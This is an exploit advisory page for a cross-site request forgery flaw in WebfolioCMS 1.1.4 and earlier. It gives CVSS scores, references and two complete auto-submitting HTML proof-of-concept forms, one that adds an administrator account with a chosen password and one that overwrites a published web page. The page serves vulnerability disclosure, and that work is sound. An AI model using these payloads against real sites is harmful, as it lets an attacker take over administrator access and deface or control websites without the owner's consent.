WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages)

2012-03-20 / 2012-03-21
Credit: Ivano Binetti
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title : WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages) # Date : 28-02-2012 # Author : Ivano Binetti (http://ivanobinetti.com) # Software link : http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/download # Vendor site : http://webfolio-cms.sourceforge.net/ # Version : 1.1.4 and lower # Tested on : Debian Squeeze (6.0) # Original Advisory: http://ivanobinetti.blogspot.com/2012/02/webfoliocms-114-csrf-add-adminmodify.html +------------------------------------------[CSRF Vulnerabilities by Ivano Binetti]-----------------------------------------------+ Summary 1)Introduction 2)Vulnerabilities Description 3)Exploit 3.1 Add Administrator 3.2 Modify Web Page +--------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction Webfolio CMS "is a free, open-source, customized content management system, whose main purpose is creation of web sites for presenting someone's work, and portfolio-like websites". 2)Vulnerabilities Description WebfolioCMS 1.1.4 (and lower) is affected by a CSRF Vulnerability which allows an attacker to add a new administrator, modify a web pages, and change may any other WebfolioCMS's parameter. In this document I will demonstrate how to add an administrator account and how to modify an existing and published web pages. other parameters can be modified with little changes. 3)Exploit 3.1 Add Administrator <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to add ADMIN account</H2> <form method="POST" name="form0" action="http://<webfolio_ip>:80/admin/users/add "> <input type="hidden" name="user[username]" value="new_admin"/> <input type="hidden" name="user[email]" value="admin@admin.com"/> <input type="hidden" name="user_meta[firstName]" value="admin_firstname"/> <input type="hidden" name="user_meta[lastName]" value="admin_lastname"/> <input type="hidden" name="user[password]" value="password"/> <input type="hidden" name="re_password" value="password"/> <input type="hidden" name="user[groupId]" value="1"/> <input type="hidden" name="add" value="Add"/> </form> </body> </html> 3.2 Modify Web Page <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to Modify published web page</H2> <form method="POST" name="form0" action="http://<webfolio_ip>:80/admin/pages/edit/web_page_name"> <input type="hidden" name="title" value="new_title"/> <input type="hidden" name="text" value="new_text"/> <input type="hidden" name="id" value="1"/> <input type="hidden" name="titleUrlFormat" value="test"/> <input type="hidden" name="save" value="Save"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------------------------------+

References:

http://xforce.iss.net/xforce/xfdb/73575
http://www.securityfocus.com/bid/52218
http://www.exploit-db.com/exploits/18536
http://secunia.com/advisories/48190
http://packetstormsecurity.org/files/110294/WebfolioCMS-1.1.4-Cross-Site-Request-Forgery.html
http://osvdb.org/79658
http://ivanobinetti.blogspot.com/2012/02/webfoliocms-114-csrf-add-adminmodify.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top